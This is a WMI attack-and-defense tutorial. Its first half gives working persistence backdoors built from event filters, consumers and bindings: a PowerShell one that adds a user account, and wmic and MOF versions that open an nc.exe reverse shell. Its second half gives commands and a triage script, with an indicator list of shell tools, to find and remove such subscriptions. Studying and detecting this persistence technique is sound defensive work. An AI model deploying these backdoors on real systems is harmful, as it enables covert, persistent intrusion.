
WMI Attack and Defense

Introduction

WMI, short for Windows Management Instrumentation, is the management technology built into Windows. Most Windows software depends on this service, which is also why attackers target it. This article describes how WMI is attacked and how it can be defended, as a basis for discussion.

Every WMI object is an instance of a class that exposes some piece of operating system information together with the operations that can be performed on it. ROOT\CIMV2 is the default namespace, the CIM repository is the database, and WQL query statements are used to query WMI object instances, classes, and namespaces.

The primary ways of interacting with WMI are:

1. PowerShell (Get-WmiObject, Set-WmiInstance, Invoke-WmiMethod, etc.)

For example: Get-WmiObject -Namespace "ROOT" -Class __NAMESPACE

2. wmic

For example: wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_OperatingSystem

Events

An event subscription consists of a query that defines the condition we are interested in and an action that runs once the event occurs. WMI supports two kinds of event subscriptions:

1. Temporary events: active only while the process that created the subscription is running (run with the current user's permissions).

For example:

# Query for new process events, polling every 5 seconds
$queryCreate = "SELECT * FROM __InstanceCreationEvent WITHIN 5 " + "WHERE TargetInstance ISA 'Win32_Process'"

# Create the action to run when the event fires
$CreateAction = {
    $name = $event.SourceEventArgs.NewEvent.TargetInstance.Name
    Write-Host "Process $($name) was created."
}

# Register the WMI event subscription
Register-WmiEvent -Query $queryCreate -Action $CreateAction

Each time a new process starts, its name is printed.

2. Persistent events: stored in the CIM repository and active until they are removed from it (run with SYSTEM permissions and survive reboots).

Persistent events as a backdoor

Using a persistent event subscription as a backdoor (creating one requires administrator privileges) involves three parts.

1. Event filter: defines the trigger condition, such as system startup, execution of a specific program, or a specific time interval. It is stored as an instance of the __EventFilter class in the root\subscription namespace; most filters use the WQL WITHIN clause to specify the polling interval.

2. Event consumer: specifies the action to perform, such as executing a command (CommandLineEventConsumer), running a script (ActiveScriptEventConsumer), writing an event log entry (NTEventLogEventConsumer), or sending mail (SMTPEventConsumer).

3. Binding: ties a filter to a consumer (the __FilterToConsumerBinding class).

Backdoor examples

Whether implemented with PowerShell, wmic, or a MOF file, the backdoor is made up of these same three parts.

PowerShell implementation

Effect: the PowerShell command runs every 60 seconds.

$filterName = 'Filtertest'
$consumerName = 'Consumertest'
$exePath = 'powershell -ep bypass -command "net user xxx xxx /add"'
# Alternative payload (not used below): -enc is base64-encoded "whoami"
$exePath2 = 'powershell -ep bypass -enc dwBoAG8AYQBtAGkA'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

Define the filter

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop

Define the consumer

$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}

Bind the filter to the consumer

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}

wmic implementation

Effect: triggers a reverse shell at a fixed interval. The Name values given to the filter and consumer must match the ones referenced by the binding.

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Filtertest", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Consumertest", ExecutablePath="C:\Users\admin\Desktop\nc.exe", CommandLineTemplate="C:\Users\admin\Desktop\nc.exe 127.0.0.1 443 -e c:\windows\system32\cmd.exe"

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Filtertest\"", Consumer="CommandLineEventConsumer.Name=\"Consumertest\""

Today, WMI is also frequently abused in this way in real-world attacks.

MOF implementation

Effect: triggers a reverse shell every 30 minutes.

#pragma namespace ("\\\\.\\root\\subscription")
instance of __EventFilter as $FILTER
{
    Name = "FilterTEST";
    EventNamespace = "root\\cimv2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Minute = 30 ";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
    Name = "ConsumerTEST";
    ScriptingEngine = "VBScript";
    ScriptText =
        "Set objShell = CreateObject(\"WScript.Shell\")\n"
        "objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 127.0.0.1 443 -e C:\\Windows\\system32\\cmd.exe\"\n";
};
instance of __FilterToConsumerBinding
{
    Consumer = $CONSUMER;
    Filter = $FILTER;
};

To compile the file and register the subscription:

mofcomp xx.mof

The consumer can also point at a VBScript file on disk instead of carrying the script inline:

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "ASEC";
    ScriptingEngine = "VBScript";
    ScriptFileName = "c:\\asec.vbs";
};

Security defense

Enumerate the existing subscriptions:

# List event filters
Get-WmiObject -Namespace root\subscription -Class __EventFilter

# List event consumers (all consumer subclasses)
Get-WmiObject -Namespace root\subscription -Class __EventConsumer

# List filter-to-consumer bindings
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding

Remove a subscription (substitute the names found above for BotFilter82 and BotConsumer23):

# Filter
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

# Consumer
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

# Binding
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
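The three commands above list filters, consumers and bindings separately; the following PowerShell script is an added example (not from the original article) that joins them by resolving each binding to its filter and consumer, then flags consumers whose command line or script text contains patterns like those in the backdoors shown on this page. The indicator list is a constructed heuristic, not an authoritative set, and the script only removes anything when -Remove is passed.

```powershell
# Added example: correlate and triage permanent WMI event subscriptions.
# Read-only unless -Remove is supplied. Requires administrator rights.
param([switch]$Remove)

$ns = 'root\subscription'
# Substrings often seen in malicious consumer payloads (constructed heuristic, extend for your environment)
$suspicious = @('powershell', '-enc', '-ep bypass', 'nc.exe', 'cmd.exe', 'wscript', 'cscript', 'mshta', 'regsvr32', 'rundll32')

$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
$consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # returns every consumer subclass
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

foreach ($b in $bindings) {
    # Binding.Filter / Binding.Consumer are object references such as
    # __EventFilter.Name="Filtertest", sometimes prefixed with \\host\namespace:
    # Strip that prefix and match against each instance's relative path.
    $relFilter   = $b.Filter   -replace '^\\\\[^:]*:', ''
    $relConsumer = $b.Consumer -replace '^\\\\[^:]*:', ''
    $filter   = $filters   | Where-Object { $_.__RELPATH -eq $relFilter }
    $consumer = $consumers | Where-Object { $_.__RELPATH -eq $relConsumer }

    # Pull whatever "payload" property this consumer type carries
    $payload = switch ($consumer.__CLASS) {
        'CommandLineEventConsumer'  { "$($consumer.ExecutablePath) $($consumer.CommandLineTemplate)" }
        'ActiveScriptEventConsumer' { if ($consumer.ScriptText) { $consumer.ScriptText } else { $consumer.ScriptFileName } }
        default                     { '' }
    }
    # -match is case-insensitive; escape the indicator so '.' and '-' are literal
    $hits = $suspicious | Where-Object { $payload -match [regex]::Escape($_) }

    [pscustomobject]@{
        Filter     = $filter.Name
        Query      = $filter.Query
        Consumer   = "$($consumer.__CLASS):$($consumer.Name)"
        Payload    = $payload
        Suspicious = [bool]$hits
        Indicators = ($hits -join ',')
    } | Format-List

    if ($Remove -and $hits) {
        # Remove the binding first, then the filter and consumer it referenced
        Write-Host "Removing subscription '$($filter.Name)' -> '$($consumer.Name)'"
        $b        | Remove-WmiObject -Verbose
        $filter   | Remove-WmiObject -Verbose
        $consumer | Remove-WmiObject -Verbose
    }
}
```

A binding whose Filter or Consumer field shows empty output points at an object that no longer exists and should be removed as well.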